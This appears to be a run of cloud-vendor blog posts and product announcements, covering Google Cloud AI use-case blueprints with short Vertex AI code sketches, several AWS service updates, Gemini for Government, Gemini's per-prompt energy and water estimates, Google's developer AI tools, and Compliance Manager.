Business challenge: You’re a collaboration software company. Valuable information shared in voice conversations and video meetings is often lost or requires hours of manual work to transcribe and summarize for those who couldn’t attend.
Tech stack: Speech-to-Text API, Vertex AI, Cloud Run functions.
Blueprint: A user connects the AI agent to their calendar. ➝ When a meeting starts, the agent joins the call and records the audio. ➝ After the meeting, a Cloud Run function sends the audio file to the Speech-to-Text API for a full transcription. ➝ The transcript is then sent to Gemini with a prompt like, “Summarize this meeting transcript, identify all action items and assign them to the correct person, and list the key decisions that were made.” ➝ The structured summary and action items are then emailed to all attendees, saving time and improving collaboration.
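A sketch of the post-meeting step, assuming the recording has been saved to Cloud Storage; the URI, timeout, and prompt wording are illustrative, and the email step is omitted.

```python
# Sketch: transcribe a meeting recording, then have Gemini produce the summary and action items.
import vertexai
from google.cloud import speech
from vertexai.generative_models import GenerativeModel


def summarize_meeting(audio_uri: str) -> str:
    stt = speech.SpeechClient()
    operation = stt.long_running_recognize(
        config=speech.RecognitionConfig(
            language_code="en-US",
            enable_automatic_punctuation=True,
        ),
        audio=speech.RecognitionAudio(uri=audio_uri),  # e.g. gs://meetings/weekly-sync.wav
    )
    response = operation.result(timeout=900)
    transcript = " ".join(r.alternatives[0].transcript for r in response.results)

    vertexai.init(project="my-project", location="us-central1")
    model = GenerativeModel("gemini-1.5-pro")
    prompt = (
        "Summarize this meeting transcript, identify all action items with their "
        "owners, and list the key decisions that were made.\n\n" + transcript
    )
    return model.generate_content(prompt).text  # email this to the attendees
```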
96. Create an enterprise search engine for workplace knowledge
Business challenge: You’re a company whose employees use dozens of different applications (like Slack, Google Drive, Salesforce, Confluence). Your challenge is that valuable company knowledge is fragmented across these silos, making it nearly impossible for employees to find the information they need to do their jobs effectively.
Tech stack: Vertex AI Search, connectors to various enterprise applications.
Blueprint: Secure connectors are used to index all of a company’s data from its various workplace apps into Vertex AI Search, respecting all existing user permissions. ➝ An employee uses a single search bar and asks a question like, “What was our Q3 marketing strategy for the new product launch?” ➝ Vertex AI Search queries across all connected data sources, finding the strategy document in Google Drive, the related conversations in Slack, and the campaign results in Salesforce. ➝ It returns a unified, synthesized answer with links to the original sources, allowing employees to quickly find the information they need to do their jobs.
97. Deploy video intelligence agents for any CCTV camera
Business challenge: You’re a business with hundreds of CCTV cameras for security. Your challenge is that these cameras generate thousands of hours of passive video footage that is only reviewed after an incident occurs, providing no proactive operational or business insights.
Tech stack: Vertex AI, Cloud Storage, a mobile alerting system.
Blueprint: Live video feeds from CCTV cameras are streamed to Google Cloud Storage. ➝ A multimodal Gemini model, acting as a “video intelligence agent,” continuously monitors the feeds. ➝ The agent is given specific tasks via natural language prompts, such as “Monitor the store entrance and send an alert if more than 10 people are waiting in line for over 5 minutes,” or “Alert security if anyone enters the warehouse after 10 PM.” ➝ When the AI agent detects a specified event, it automatically sends a real-time alert with a video clip to the relevant personnel’s mobile device.
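A minimal sketch of one monitoring check, assuming the live feed is chunked into short clips in Cloud Storage before each call; the bucket path, task wording, and alerting step are placeholders.

```python
# Sketch: send a stored CCTV clip to a multimodal Gemini model with a monitoring task.
import vertexai
from vertexai.generative_models import GenerativeModel, Part

vertexai.init(project="my-project", location="us-central1")  # placeholders
model = GenerativeModel("gemini-1.5-pro")

TASK = ("Monitor the store entrance. If more than 10 people appear to be waiting "
        "in line, answer ALERT and describe what you see; otherwise answer OK.")


def check_clip(gcs_uri: str) -> str:
    clip = Part.from_uri(gcs_uri, mime_type="video/mp4")
    return model.generate_content([TASK, clip]).text


verdict = check_clip("gs://cctv-archive/entrance/latest-clip.mp4")  # hypothetical path
if verdict.startswith("ALERT"):
    print("send a push notification with the clip link to store staff")
```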
98. Build an agent for B2B workflow automation
Business challenge: You’re a B2B technology company, and you recognize that your clients in different departments (e.g., sales, HR, finance) have unique, complex workflows that are difficult to automate with one-size-fits-all software.
Tech stack: Vertex AI, various third-party API connectors.
Blueprint: A platform provides a framework for building specialized AI agents. ➝ A company can create an “HR Onboarding Agent” and give it access to their HR systems. ➝ When a new employee is hired, the agent automatically executes a multi-step workflow: it creates their user account, assigns required training, and schedules orientation meetings. ➝ The agent uses Gemini to orchestrate these tasks by calling the appropriate APIs for each system, automating a complex cross-departmental workflow that would otherwise require significant manual coordination.
99. Transform customer feedback into product insights
Business challenge: You’re a product development company, and you need to understand how customers feel about your product, but their feedback is scattered across support tickets, app store reviews, and social media. Manually analyzing this unstructured text is a massive challenge.
Tech stack: Vertex AI, BigQuery, data ingestion tools (e.g., Pub/Sub).
Blueprint: All customer feedback streams from various sources into BigQuery. ➝ A scheduled job sends batches of new feedback to a Gemini model. ➝ The model is given a prompt like, “Analyze this feedback. Categorize each comment by topic (e.g., ‘UI/UX’, ‘Pricing’, ‘Bug Report’), determine the sentiment (Positive, Negative, Neutral), and extract any feature requests.” ➝ The structured, analyzed data is written back to BigQuery. ➝ Product managers can now use a simple dashboard to see trends, like “There was a 30% increase in negative comments about ‘login issues’ this week,” allowing them to take data-driven action.
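A simplified sketch of the scheduled job, assuming Python, placeholder table names, and the Vertex AI SDK; a production job would batch rows and validate the model’s JSON output before writing it back:

# pip install google-cloud-bigquery google-cloud-aiplatform
from google.cloud import bigquery
import vertexai
from vertexai.generative_models import GenerativeModel

# Placeholder project and table names.
vertexai.init(project="my-project", location="us-central1")
bq = bigquery.Client()
model = GenerativeModel("gemini-1.5-flash")

rows = bq.query(
    "SELECT id, comment FROM `my-project.feedback.raw` WHERE analyzed IS NULL LIMIT 100"
).result()

analyzed = []
for row in rows:
    prompt = (
        "Analyze this feedback. Categorize the comment by topic "
        "(e.g., 'UI/UX', 'Pricing', 'Bug Report'), determine the sentiment "
        "(Positive, Negative, Neutral), and extract any feature requests. "
        "Return JSON with keys topic, sentiment, feature_requests.\n\n" + row.comment
    )
    analyzed.append({"id": row.id, "analysis": model.generate_content(prompt).text})

# Write the structured results back to BigQuery for dashboarding.
bq.insert_rows_json("my-project.feedback.analyzed", analyzed)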
100. Automate the creative process in marketing campaigns
Business challenge: You’re a digital marketing platform, and your clients need to create a high volume of ads for different products and channels. Your challenge is automating the creative process so they can launch effective campaigns without needing a large design team.
Tech stack: Vertex AI, Cloud Run, Text-to-Speech API.
Blueprint: A user provides a few key details about their product and a target audience. ➝ This information is sent to a service on Cloud Run, which constructs a prompt for Gemini like, “Generate three different ad headlines and a short script for a 15-second video ad for a new running shoe targeting marathon runners.” ➝ Gemini generates the text. ➝ The service then sends the script to the Text-to-Speech API to create a voiceover. ➝ The text and voiceover are then combined with product images using a template, automatically generating multiple ad variations that are ready to be deployed.
101. Provide an AI observability platform for LLM evaluation
Business challenge: You’re an enterprise that is deploying multiple AI applications, but you lack the tools to monitor, troubleshoot, and evaluate their performance in production. Your challenge is ensuring these AI systems are accurate, safe, and effective once they are live.
Tech stack: Google Kubernetes Engine (GKE), BigQuery, Vertex AI.
Blueprint: An enterprise’s AI applications send their inputs, outputs, and model telemetry data to an observability platform running on GKE. ➝ This data is processed and stored in BigQuery for large-scale analysis. ➝ The platform uses Vertex AI models to automatically detect issues like “model drift” (when a model’s performance degrades over time) or “hallucinations” (when an LLM generates incorrect information). ➝ When an issue is detected, the platform sends an alert to the development team via a dashboard, allowing them to quickly diagnose and fix problems with their production AI systems.
Today, Amazon Web Services announced improved Amazon CloudWatch alarm integration for Amazon VPC IP Address Manager (IPAM). This enhancement provides better visibility and management of existing CloudWatch alarms directly from the IPAM console. With this new integration, you can quickly identify potential IP address management issues and take proactive actions across your organization.
The enhanced integration brings IPAM-related CloudWatch alarms directly into the IPAM console, providing a unified view of alarm states across all IPAM pages. This visibility enables quick response to potential IP address management issues. You can now create CloudWatch alarms directly from the IPAM console – clicking the ‘Create Alarm’ option redirects you to CloudWatch with relevant fields pre-populated, streamlining IP usage alert setup. A new resource-level “Alarms” tab offers comprehensive visibility into all alarms associated with specific IPAM resources, making it easier to manage and monitor your IP address space effectively.
This improved integration is particularly valuable for networking teams managing IP address spaces, as it helps prevent issues through better visibility and easier management of existing alarms. The console also provides proactive monitoring suggestions for resources without associated alarms, helping ensure comprehensive monitoring coverage across your IP address management infrastructure.
This feature is now available in all AWS Regions where Amazon VPC IPAM is supported, including AWS China Regions, and AWS GovCloud (US) Regions.
Amazon Cognito now allows you to configure terms of use and privacy policy documents for Managed Login pages. This helps customers seamlessly present legal terms during user registration while simplifying implementation. With Managed Login, Cognito customers could previously use its no-code editor to customize the user journey from signup and login to password recovery and multi-factor authentication. Now, customers can additionally use Managed Login to easily set up terms of use and privacy policy documents, saving development teams from building custom solutions.
With this capability, you can configure terms of use and privacy policy URLs for each app client in your Cognito user pool. When users register, they see text indicating that by signing up, they agree to your terms of use and privacy policy, and a link to your webpage with the agreement. You can configure different URLs for each supported language to match your Managed Login localization settings. For example, if you have configured the privacy policy and terms of use documents for French (fr) and the same is selected in the lang query-parameter on the sign-up page URL, users will see the French URL you configured.
This capability is available to Amazon Cognito customers using the Essentials or Plus tiers in AWS Regions where Cognito is available, including the AWS GovCloud (US) Regions. To learn more, refer to the developer guide and Pricing Detail Page for Cognito Essentials and Plus tier.
Amazon CloudWatch Logs Insights expands natural language query result summarization to 15 additional AWS Regions: Asia Pacific (Hong Kong, Malaysia, Mumbai, Thailand, Tokyo, Singapore, Sydney), Europe (Frankfurt, Ireland, London, Spain, Stockholm), South America (Sao Paulo), US East (Ohio), and US West (Oregon).
CloudWatch Logs Insights lets you interactively search and analyze your logs with Logs Insights query language, OpenSearch Service Piped Processing Language (PPL), and OpenSearch Service Structured Query Language (SQL). The query result summarization capability generates a natural language summary of the query results, providing users with clear, actionable insights. Interpreting log entries can be time-consuming and this feature transforms complex query results into concise summaries that help you quickly identify issues and gain actionable insights from your log data.
In addition, natural language query generation capability in CloudWatch Logs is now available for CloudWatch Logs Insights and Metrics Insights in 6 additional AWS Regions: Asia Pacific (Malaysia, Mumbai, Thailand), Europe (London, Spain), and South America (Sao Paulo). Query generation for PPL and SQL languages is available in 3 additional AWS Regions: Asia Pacific (Mumbai), Europe (London), and South America (Sao Paulo). Natural language query generation powered by generative AI allows users to use plain English to quickly generate queries in the context of their logs without needing extensive knowledge of the query language, reducing time to gather insights.
To learn about the log summarizer in CloudWatch Logs Insights, visit the Amazon CloudWatch Logs documentation. To learn about natural language query generation, go to CloudWatch Logs documentation.
Google is proud to support the U.S. government in its modernization efforts through the use of AI. Today, in partnership with the General Services Administration (GSA) and in support of the next phase of the GSA’s OneGov Strategy and President Trump’s AI Action Plan, we’re thrilled to announce a new, comprehensive ‘Gemini for Government’ offering.
Building on the well-received Google Workspace discount we announced for government agencies earlier this year, ‘Gemini for Government’ brings together the best of Google’s AI-optimized and accredited commercial cloud, industry-leading Gemini models, and agentic solutions to support the missions of government agencies like never before. While many AI models have been offered to the government, the ‘Gemini for Government’ offering is a complete AI platform – including Google-quality enterprise search, video and image generation capabilities, the popular NotebookLM AI tool, out-of-the-box AI agents for Deep Research and Idea Generation, and the ability for employees to create their own AI agents. Priced at less than $0.50 per government agency for a year, this comprehensive package enables U.S. government employees to access Google’s leading AI offerings at very little cost.
“GSA appreciates Google’s partnership and we’re excited to add the comprehensive ‘Gemini for Government’ AI solution to OneGov,” said Federal Acquisition Service Commissioner Josh Gruenbaum. “GSA is delivering on the President’s AI Action Plan and helping agencies access powerful American AI tools to optimize daily workflows and create a more efficient, responsive, and effective government for American taxpayers. Critically, this offering will provide partner agencies with vital flexibility in GSA’s marketplace, ensuring they have the options needed to sustain a strong and resilient procurement ecosystem.”
Josh Gruenbaum
Federal Acquisition Service Commissioner
‘Gemini for Government’ includes FedRAMP High-authorized security and compliance features. (For a complete list of Google’s FedRAMP authorized services, visit ‘Google Services’ on the FedRAMP Marketplace.) ‘Gemini for Government’ is a seamlessly integrated solution designed from the ground up for AI, and is built upon three pillars:
1. An enterprise platform with choice and control
‘Gemini for Government’ brings the best of commercial innovation to the government with an AI Agent Gallery; agent-to-agent communication protocols; connectors into enterprise data sets; pre-built AI agents; and an open platform that enables agencies to choose the right agents for their users – whether built by Google, third-parties, or government agencies themselves. Being able to launch and monitor agentic use cases through ‘Gemini for Government’ gives agencies flexibility and control. They can closely manage and scale agency-wide agent adoption with user access controls, AI agent provisioning, and multi-agent coordination. ‘Gemini for Government’ also pairs with Google Cloud’s Vertex AI platform, which allows agencies to tune or ground their own models as well.
2. Super-powered security, built-in
Every day, Google protects billions of customer devices, collects frontline cyber threat intelligence, and provides industry-leading cyber incident response to entities around the world. This wealth of expertise underpins the security protection integrated into all of our products. As part of the ‘Gemini for Government’ offering, agencies also receive built-in Advanced Security features, including Identity & Access Management, basic threat protection, AI threat protection, data privacy, SOC2 Type 2 compliance, advanced compliance (with Sec4, FedRAMP), and more. Agencies also have the option of deploying additional Google security solutions at discounted government pricing – and these solutions seamlessly integrate with various third-party security solutions and security stacks, allowing organizations to maximize the value of their investments.
3. A true transformation partner
By working with the GSA under its OneGov Strategy, Google ensures that government agencies will find ‘Gemini for Government’ easy to implement and use. Our offering is aligned with how government procurement works – today and into the future – and includes transparent pricing and a predictable path to realizing value, helping agencies future-proof their AI investments. Of course, Google’s commitment to the government extends far beyond providing cutting-edge AI solutions. We are a long-term, strategic partner for America, deeply invested in the mission, innovation, and security of our government.
We’re excited to embark on this journey with the public sector, working hand-in-hand with the GSA to realize the full potential of OneGov through our ‘Gemini for Government’ offering. Together, we can help to scale innovation, drive efficiency, and create a more secure – and prosperous – future for our nation. Agencies ready to learn more about this offering should reach out to the National Customer Service Center at ITCSC@gsa.gov or Google Public Sector at geminiforgov@google.com.
AI is unlocking scientific breakthroughs, improving healthcare and education, and could add trillions to the global economy. Understanding AI’s footprint is crucial, yet thorough data on the energy and environmental impact of AI inference — the use of a trained AI model to make predictions or generate text or images — has been limited. As more people use AI systems, the importance of inference efficiency rises.
That’s why we’re releasing a technical paper detailing our comprehensive methodology for measuring the energy, emissions, and water impact of Gemini prompts. Using this methodology, we estimate the median Gemini Apps text prompt uses 0.24 watt-hours (Wh) of energy, emits 0.03 grams of carbon dioxide equivalent (gCO2e), and consumes 0.26 milliliters (or about five drops) of water1 — figures that are substantially lower than many public estimates. The per-prompt energy impact is equivalent to watching TV for less than nine seconds.
At the same time, our AI systems are becoming more efficient through research innovations and software and hardware efficiency improvements. For example, over a recent 12-month period, the energy and total carbon footprint of the median Gemini Apps text prompt dropped by 33x and 44x, respectively, all while delivering higher quality responses. These results are built on our latest data center energy emissions reductions and our work to advance carbon-free energy and water replenishment. While we’re proud of the innovation behind our efficiency gains so far, we’re committed to continuing substantial improvements. Here’s a closer look at these ongoing efforts.
Calculating the environmental footprint of AI at Google
Detailed measurement lets us compare across different AI models, and the hardware and energy they run on, while enabling system-wide efficiency optimizations — from hardware and data centers to the models themselves. By sharing our methodology, we hope to increase industry-wide consistency in calculating AI’s resource consumption and efficiency.
Measuring the footprint of AI serving workloads isn’t simple. We developed a comprehensive approach that considers the realities of serving AI at Google’s scale, which include:
Full system dynamic power: This includes not just the energy and water used by the primary AI model during active computation, but also the actual achieved chip utilization at production scale, which can be much lower than theoretical maximums.
Idle machines: To ensure high availability and reliability, production systems require a degree of provisioned capacity that is idle but ready to handle traffic spikes or failover at any given moment. The energy consumed by these idle chips must be factored into the total energy footprint.
CPU and RAM: AI model execution doesn’t happen solely in ML accelerators like TPUs and GPUs. The host CPU and RAM also play a crucial role in serving AI, and use energy.
Data center overhead: The energy consumed by the IT equipment running AI workloads is only part of the story. The infrastructure supporting these computations — cooling systems, power distribution, and other data center overhead — also consumes energy. Overhead energy efficiency is measured by a metric called Power Usage Effectiveness (PUE).
Data center water consumption: To reduce energy consumption and associated emissions, data centers often consume water for cooling. As we optimize our AI systems to be more energy-efficient, this naturally decreases their overall water consumption as well.
Many current AI energy consumption calculations only include active machine consumption, overlooking several of the critical factors discussed above. As a result, they represent theoretical efficiency instead of true operating efficiency at scale. When we apply this non-comprehensive methodology that only considers active TPU and GPU consumption, we estimate the median Gemini text prompt uses 0.10 Wh of energy, emits 0.02 gCO2e, and consumes 0.12 mL of water. This is an optimistic scenario at best and substantially underestimates the real operational footprint of AI.
Our comprehensive methodology’s estimates (0.24 Wh of energy, 0.03 gCO2e, 0.26 mL of water) account for all critical elements of serving AI globally. We believe this is the most complete view of AI’s overall footprint.
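The gap between the two estimates comes down to simple arithmetic. The sketch below uses invented, illustrative inputs (not Google's measured values) purely to show how host energy, idle capacity, and PUE overhead compound on top of accelerator energy:

# Illustrative only: these inputs are invented for the example and are not
# Google's measured figures.
accelerator_wh = 0.10   # active TPU/GPU energy per prompt (narrow method)
host_wh = 0.03          # host CPU and RAM energy attributed to the prompt
idle_fraction = 0.25    # share of provisioned-but-idle serving capacity
pue = 1.09              # data center overhead (Power Usage Effectiveness)

# Narrow methodology: active accelerators only.
narrow_estimate = accelerator_wh

# Comprehensive methodology: add host energy and idle capacity, then apply PUE.
it_energy = (accelerator_wh + host_wh) * (1 + idle_fraction)
comprehensive_estimate = it_energy * pue

print(f"narrow: {narrow_estimate:.2f} Wh, comprehensive: {comprehensive_estimate:.2f} Wh")
# With these invented inputs the comprehensive figure is roughly 1.8x the narrow
# one, illustrating the same direction (though not the same numbers) as the
# 0.10 Wh vs. 0.24 Wh estimates above.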
Our full-stack approach to AI — and AI efficiency
Gemini’s dramatic efficiency gains stem from Google’s full-stack approach to AI development — from custom hardware and highly efficient models, to the robust serving systems that make these models possible. We’ve built efficiency into every layer of AI, including:
More efficient model architectures: Gemini models are built on the Transformer model architecture developed by Google researchers, which provides a 10-100x efficiency boost over the previous state-of-the-art architectures for language modeling. We design models with inherently efficient structures like Mixture-of-Experts (MoE) and hybrid reasoning. MoE models, for example, allow us to activate a small subset of a large model specifically required to respond to a query, reducing computations and data transfer by a factor of 10-100x.
Efficient algorithms and quantization: We continuously refine the algorithms that power our models with methods like Accurate Quantized Training (AQT) to maximize efficiency and reduce energy consumption for serving, without compromising response quality.
Optimized inference and serving: We constantly improve AI model delivery for responsiveness and efficiency. Technologies like speculative decoding serve more responses with fewer chips by allowing a smaller model to make predictions that are then quickly verified by a larger model, which is more efficient than having the larger model make many sequential predictions on its own. Techniques like distillation create smaller, more efficient models (Gemini Flash and Flash-Lite) for serving that use our larger, more capable models as teachers. Faster machine learning hardware and models enable us to use more efficient larger batch sizes when handling requests, while still meeting our latency targets.
Custom-built hardware: We’ve been designing our TPUs from the ground up for over a decade to maximize performance per watt. We also co-design our AI models and TPUs, ensuring our software takes full advantage of our hardware — and that our hardware is able to efficiently run our future AI software when both are ready. Our latest-generation TPU, Ironwood, is 30x more energy-efficient than our first publicly-available TPU and far more power-efficient than general-purpose CPUs for inference.
Optimized idling: Our serving stack makes highly efficient use of CPUs and minimizes TPU idling by dynamically moving models based on demand in near-real-time, rather than using a “set it and forget it” approach.
ML software stack: Our XLA ML compiler, Pallas kernels, and Pathways systems enable model computations expressed in higher-level systems like JAX to run efficiently on our TPU serving hardware.
Ultra-efficient data centers: Google’s data centers are among the industry’s most efficient, operating at a fleet-wide average PUE of 1.09.
Responsible data center operations: We continue to add clean energy generation in pursuit of our 24/7 carbon-free ambition, while advancing our aim to replenish 120% of the freshwater we consume on average across our offices and data centers. We also optimize our cooling systems to balance the local trade-offs between energy, water, and emissions, conducting science-backed watershed health assessments to guide cooling type selection and limit water use in high-stress locations.
Our commitment to efficient AI
Gemini’s efficiency gains are the result of years of work, but this is just the beginning. Recognizing that AI demand is growing, we’re heavily investing in reducing the power provisioning costs and water required per prompt. By sharing our findings and methodology, we aim to drive industry-wide progress toward more efficient AI. This is essential for responsible AI development.
1. A point-in-time analysis quantified the energy consumed per median Gemini App text-generation prompt, considering data from May 2025. Emissions per prompt were estimated based on energy per prompt, applying Google’s 2024 average fleetwide grid carbon intensity. Water consumption per prompt was estimated based on energy per prompt, applying Google’s 2024 average fleetwide water usage effectiveness. These findings do not represent the specific environmental impact for all Gemini App text-generation prompts, nor are they indicative of future performance.
2. The results of the above analysis from May 2025 were compared to baseline data from the median Gemini App text-generation prompt in May 2024. Energy per median prompt is subject to change as new models are added, AI model architecture evolves, and AI chatbot user behavior develops. The data and claims have not been verified by an independent third party.
AWS IoT Core now supports customer-managed keys (CMK) through AWS Key Management Service (KMS), enabling you to encrypt data stored in IoT Core with your own encryption keys. This enhancement gives you greater control over your encryption key lifecycle, including creation, rotation, monitoring, and deletion. Moreover, when you opt for CMK, the service handles the transition by automatically re-encrypting existing data while helping to maintain uninterrupted IoT operations. Operating within the AWS shared responsibility model, this security enhancement helps organizations meet their security requirements without impacting their IoT applications.
AWS Security Incident Response now offers seamless integration with popular IT Service Management (ITSM) tools like Jira and ServiceNow, enabling you to respond faster to security incidents while maintaining your existing processes and operating models. These integrations provide bidirectional synchronization, allowing you to create, update, and delete issues in either platform with automatic data replication into AWS Security Incident Response cases. Comments and attachments are also fully synchronized between platforms.
The integrations are available as open-source projects on GitHub, providing customers and partners the opportunity to contribute to and extend the functionality. The repository includes sample code, deployment instructions, and best practices for building custom integrations with AWS Security Incident Response. The solution features a modular architecture that makes it straightforward to add new integration targets beyond the initial Jira and ServiceNow offerings. The GitHub repository includes guidance on how to leverage tools like Amazon Q Developer, Kiro, or similar AI assistants for rapid customization and use with your favorite ITSM platform.
To get started with AWS Security Incident Response ITSM Integrations, visit our GitHub repository. Visit our technical documentation for Jira and ServiceNow for implementation details. Learn more about AWS Security Incident Response in the service’s User Guide.
AWS Security Incident Response is now Health Information Trust Alliance Common Security Framework (HITRUST CSF) certified, demonstrating its alignment with stringent security and privacy requirements established by HITRUST for managing sensitive data. This certification validates that AWS Security Incident Response meets comprehensive security controls required by healthcare, life sciences and many other regulated sectors.
HITRUST CSF is a comprehensive security and privacy framework developed by the HITRUST Alliance to help organizations in the healthcare industry and other regulated sectors effectively manage information risk and comply with a variety of security, privacy and regulatory requirements. It provides a scalable, transparent, and certifiable approach based on well-known industry standards and regulations, allowing organizations to demonstrate their commitment to protecting sensitive data and meeting compliance obligations. AWS customers can achieve HITRUST certification using AWS products and inherit AWS HITRUST scores, reducing the audit burden for both parties. Visit the AWS Services in Scope by Compliance Program to see a full list of services also covered by HITRUST.
AWS Security Incident Response automates security alert monitoring, streamlines incident response coordination, and provides direct access to 24/7 security experts, enabling organizations to efficiently detect, investigate, and mitigate security incidents. To learn more, see the AWS Security Incident Response documentation. Get started today by visiting AWS Security Incident Response via the console, AWS Command Line Interface, or APIs.
Do you remember packing for an extended trip twenty years ago? We had to load up a camera, a day planner, a pile of books, a handheld gaming device, a map-stuffed tourist guide, a phone, a CD player, and maybe some traveler’s checks. Now? Just remember your smartphone!
This is an example of consolidation, but sometimes diversification happens. For example, it wasn’t long ago that your “computer” was simply a desktop PC that was your one device for everything. Now, we have laptops for portable work, tablets for casual digital consumption, smartphones for on-the-go internet, smart TVs for watching every type of content, and a myriad of gaming consoles.
This dynamic reminds me of the current state of developer tooling. Until recently, it was fairly static — UX design tools for mock-ups, IDEs to write code, build systems to assemble artifacts, systems and shell scripting to get infrastructure and apps deployed. It’s become wildly more diverse and dynamic thanks to generative AI. What we do, and what we use, will never be the same.
So when do I use what? Google alone offers LLM interfaces like the Gemini app and Google AI Studio, IDE extensions like Gemini Code Assist, browser-based dev environments like Firebase Studio, along with agentic services like Jules and the Gemini CLI. It’s easy to feel overwhelmed. Let’s break it down.
This diversification of tools is due, in part, to the new ways AI can assist us in software engineering.
We now have delegated, agentic options. Think of outsourcing the work to a third party where you provide detailed instructions, and only have limited interactions until the work is complete. The goal here is to get the work done quickly, and you aren’t focused on growing your own knowledge.
The next category is supervised, where you have AI acting more like someone who works for you. It’s more interactive, but you’re scaling by providing experience-based intent to an AI agent.
The final category is collaborative. Here, we’re in a conversational interaction with an AI assistant, going back and forth as we “learn” together.
Key takeaways for each AI developer tool
Jules is best for explicit instructions that can drive unattended batch work—add documentation, improve test coverage, perform surgical code modernizations—against source code in GitHub.com
No infrastructure or machinery to manage and update
Iterate with Jules on a plan before sending it off to do work
Get back a set of changes and a pull request to accept them
The Gemini CLI offers an open, fast, and flexible interface for working with code and content interactively or through delegation
Lightweight CLI tool that only requires a local install of Node
Many extensibility points including built-in tools along with support for MCP
Built into other tools like Gemini Code Assist and Firebase Studio
The open source Gemini CLI GitHub Actions are ideal for delegating background work to code repos—issue triage, pull request review—through async or user-initiated triggers
Comes with generous free usage limits for premier Gemini models. It supports enterprise access through Vertex AI models and also works with your Gemini Code Assist license.
Gemini Code Assist provides a rich IDE extension for conversational or agentic interactions with a codebase
Plug-in for Visual Studio Code and JetBrains IDEs
Offers code completion, test generation, code explanation, and code generation
Extensibility through custom commands, tools support, and code customization on private codebases. Agent mode is powered by the Gemini CLI and enables more complex interactions
Free tier along with per-user-per-month pricing for teams
Firebase Studio is the right choice when you want to build professional-grade software without the need to be a professional developer, while working in a Google-managed and browser-based dev environment
Built-in templates for popular frameworks and languages to start your project
Let Gemini vibe code your app or dive into the code thanks to the full power of an underlying customizable VM
Configure the workspace environment using nix
No cost during preview, and more environments available for those who sign up for the Google Developer Program
Google AI Studio delivers the best way to interact with Google’s latest models, experiment with prompts, and vibe code lightweight web apps
Generate media, use the Live API for interactive sessions, and write prompts against Gemini and Gemma models
Write prompts, use tools, ground with Google Search, and run comparisons
Get API keys to call Gemini models programmatically
Generous free tier along with a paid tier offering higher rate limits, more features, and different data handling
Cheatsheet:
Choose the Gemini app for quick app prototyping
Choose Google AI Studio for prompt experimentation with specific models and capabilities.
Choose Gemini Code Assist for AI-assisted software development in your environment, with your preferred toolchain.
Choose Firebase Studio when you want to come to a fully Google-managed environment to prototype or vibe code beautiful software without needing to be a full-time software developer.
Choose the Gemini CLI when you’re working with a wide array of generative AI projects and want the speed and portability of an agentic CLI. And choose the Gemini CLI GitHub Actions when you want to use Google Cloud security and models while triggering interactive or background tasks for GitHub-based projects.
Choose Jules when you’ve got GitHub-based projects that need changes that can be clearly articulated in a set of instructions.
I haven’t seen software development tools change this much—or such an eager willingness to try anything new—at any time in my career. It’s exciting and confusing. It’s important to see these tools as complementary, and you’ll likely use a mix to accomplish your tasks. At Google, we’re going to continue to focus on giving you the best AI tools to build the best AI apps. Let us know how to make both experiences better!
As organizations increase their focus on security and regulatory compliance, Google Cloud is helping our customers meet these obligations by fostering better collaboration between security and compliance teams, and the wider organization they serve.
To help simplify and enhance how organizations manage security, privacy, and compliance in the cloud, we’re thrilled to announce that Google Cloud Compliance Manager is now available in preview. Integrated into Security Command Center, this new capability provides a unified platform for configuring, monitoring, and auditing security and compliance across your infrastructure, workloads, and data.
Our AI-powered approach to supporting security and compliance obligations automates monitoring, detection, and reporting, and can help reduce manual effort while improving accuracy.
The bidirectional ability to translate regulatory controls into service level configurations or technical controls, and technical controls into policies, is essential for mitigating IT risks and streamlining operations. The ability to understand and visualize this interrelation between regulations and technical guardrails can help organizations establish a unified perspective on security and compliance risks and their remediation.
Security and Compliance are interrelated.
Reducing risk with smarter compliance
Many organizations have security and compliance obligations that need to align with government, industry, and enterprise-specific requirements. Compliance Manager allows you to configure these obligations using simple yet customizable constructs, prevent misconfigurations, monitor drifts and generate evidence of conformance within the same product experience. It supports standard security and compliance benchmarks, while allowing for customization at multiple levels.
Compliance Manager is designed to address these industry needs by unifying the entire security and compliance journey into three phases: configure, monitor, and audit.
Configure: You can express and enforce your security, privacy, and compliance intent based on your needs and risk tolerance using Compliance Manager, which provides a comprehensive library of frameworks and cloud controls, addressing global security and compliance regulations across industries and sectors. You can deploy these in preventive, detective, and evidence generation modes at different granularities, including organization, folder, and projects. You can also customize standard frameworks, and create your own to meet specific organization policies and unique needs.
Monitor: To continuously monitor and generate reports against your intended posture, Compliance Manager provides near real-time visibility into your compliance status, enabling proactive identification and remediation of potential issues. You can view findings and risks, with customizable and downloadable reports.
Audit: Audit Manager helps you generate evidence of conformance to security, privacy, and compliance that can be used for internal and external audits. It can automate and simplify the audit process, help you assess workloads for compliance, gather required evidence, and provide comprehensive audit reports. The effectiveness of this audit evidence generation has been validated through our partnership with FedRAMP for the FedRAMP 20X initiative.
Core constructs: Frameworks and CloudControls
Compliance Manager introduces Frameworks and CloudControls as two new platform components to express security, privacy, and compliance intent.
Frameworks are collections of technical controls that can also be mapped to regulatory controls. A framework can represent the following:
Industry-defined security and compliance standards such as CIS, CSA-CCM, SOC2, ISO 27001, NIST-800-53, FedRAMP-High, PCI-DSS, GDPR.
Google Cloud-defined security, privacy, and compliance best practices, including for AI security, data security, and cloud security.
Customer-defined collection of technical policies and controls representing company or industry best practices.
CloudControls are platform-agnostic building blocks that encapsulate the business logic for configuration (preventative mode), checks (detective mode), and evidence collection (audit mode). These controls support settings and checks for multiple resources and attributes, and can be parameterized for deployment time customizations. Customers can also write their own custom cloud controls.
Compliance Manager comes with a library of Frameworks and Cloud Controls, and we plan to add more as customer needs evolve. You can customize these framework templates or compose your own by selecting from the library Cloud Controls. You can also create custom Cloud Controls either manually or with help from Compliance Manager’s GenAI-based control authoring feature, providing quick time to value.
How to get started
Compliance Manager can be accessed directly from the Compliance navigation link, located under Security in Google Cloud Console. Go to the Compliance Overview page to start using it.
Compliance Manager overview on Google Cloud Console.
We have more updates planned for Compliance Manager as we build out its robust capabilities. We value your input, and would love to incorporate your feedback into our product roadmap. You can contact us through your Google Cloud account team, or send us your feedback at compliance-manager-preview@google.com.
In the age of data democratization and generative AI, the way organizations handle data has changed dramatically. This evolution creates opportunities — and security risks. The challenge for security teams isn’t just about protecting data; it’s about scaling security and compliance to meet this new reality.
While traditional security controls are vital to risk mitigation, many data security posture management solutions lack the necessary capabilities that today’s organizations require. For example, an organization with AI workloads needs to make sure that sensitive data is not leaking into the training environment; that intellectual property such as models and weights are protected from exfiltration; and that all their models support “compliance explainability.”
